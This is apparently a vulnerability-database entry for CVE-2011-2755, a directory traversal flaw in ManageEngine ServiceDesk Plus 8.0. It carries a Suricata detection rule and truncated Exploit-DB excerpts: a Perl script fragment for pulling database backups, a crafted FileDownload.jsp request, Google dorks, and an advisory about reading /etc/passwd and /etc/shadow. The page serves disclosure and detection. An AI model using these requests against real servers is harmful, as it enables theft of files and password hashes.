CVE-2011-2755
Published 2011-07-17
Priority: P3 · 46 · medium · CVSS 2.0 score 5
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N
EXPLOIT
EPSS: 30.88% (98.0th percentile)
Directory traversal vulnerability in FileDownload.jsp in ManageEngine ServiceDesk Plus 8.0 before Build 8012 allows remote attackers to read arbitrary files via unspecified vectors.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| manageengine | servicedesk_plus | — | — |
Suricata
ET WEB_SPECIFIC_APPS ManageEngine ServiceDesk Plus Arbitrary File Access via Parameter Traversal (CVE-2011-2755)
suricata·2025-12-15·CVSS 5.0
CVE-2011-2755 [MEDIUM] ET WEB_SPECIFIC_APPS ManageEngine ServiceDesk Plus Arbitrary File Access via Parameter Traversal (CVE-2011-2755)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS ManageEngine ServiceDesk Plus Arbitrary File Access via Parameter Traversal (CVE-2011-2755)"; flow:established,to_server; http.uri; content:"/workorder/FileDownload.jsp|3f|"; fast_pattern; startswith; content:"module|3d|agent"; content:"FILENAME|3d|"; pcre:"/^[^&]*?(?:(?:\x2e|%(?:25)?2[Ee]){1,2}(?:\x2f|\x5c|%(?:25)?5[Cc]|%(?:25)?2[Ff]){1,}){2,}/R"; reference:url,www.exploit-db.com/exploits/17437; reference:cve,2011-2755; classtype:web-application-attack; sid:2066333; rev:1; metadata:affected_product Zoho_ManageEngine, attack_target Server, tls_state TLSDecrypt, created_at 2025_12_15, cve CVE_2011_2755, deploym
Exploit-DB
ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure
exploitdb·2011-07-07
CVE-2011-2757 ManageEngine ServiceDesk 8.0.0.12 - Database Disclosure
---
# Exploit Title: ManageEngine ServiceDesk new();
$url="http://127.0.0.1";
$path="/workorder/FileDownload.jsp";
$installPath=&getInstallPathWin($url,$path);
if ($installPath ne "") {
@backups=&getServerOutLogs($url,$path,$installPath);
} else {
print "Install path not found :(\n";
exit();
}
if (scalar(@backups)>0) {
print "hehe.. We got paths to backup files..\n If they are
on the same drive and exists - we will own their world!!\n";
foreach $backLine (@backups) {
@backInfo=split(/ --- /,$backLine);
#print "Trying to download $backInfo[1] from
$backInfo[0]...\n";
&downloadBackups($url,$path,$backLine);
}
}
unlink("bad");
print "Dude, check out \'db_backups.html\'\n";
sub downloadBackups {
my ($url,$path
Exploit-DB
ManageEngine ServiceDesk Plus 8.0 - Directory Traversal
exploitdb·2011-06-23
CVE-2011-2757 ManageEngine ServiceDesk Plus 8.0 - Directory Traversal
---
Google Dork: ie: intitle:ManageEngine ServiceDesk Plus"
Author: Keith Lee, @keith55, http://milo2012.wordpress.com
Software Link: http://www.manageengine.com/products/service-desk/91677414/ManageEngine_ServiceDesk_Plus.exe
Version: 8.0
Description:
Directory traversal vulnerabilities have been found in ManageEngine ServiceDesk Plus 8.0, a web-based helpdesk system written in Java.
The vulnerability can be exploited to access local files by entering special characters in variables used to create file paths. The attackers use "../" sequences to move up to the root directory, thus permitting navigation through the file system.
Request:
GET http://[webserver IP]:8080/workorder/FileDownload.jsp?module=agent&&F
Exploit-DB
ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal
exploitdb·2011-06-23
CVE-2011-2757 ManageEngine Support Center Plus 7.8 Build 7801 - Directory Traversal
---
Advisory:
ManageEngine Support Center Plus 7.8 build 0x90.nl
Software link:
http://www.manageengine.com/products/support-center/download.html
Tested on:
Linux & Windows
Category:
Directory Traversal
Severity:
High
Google Dork: intitle:ManageEngine SupportCenter Plus
Description:
It's possible to access all local files on the server, and because Support Center Plus runs as root/Administrator by default, it's possible to access files owned by superusers too.
This, for example, makes it possible to grab the "/etc/shadow" file on a Linux box.
An authenticated user on the helpdesk is not needed, so any attacker can exploit this vulnerability without credentials.
Requests Linux:
Grab the /etc/passwd & /etc/shado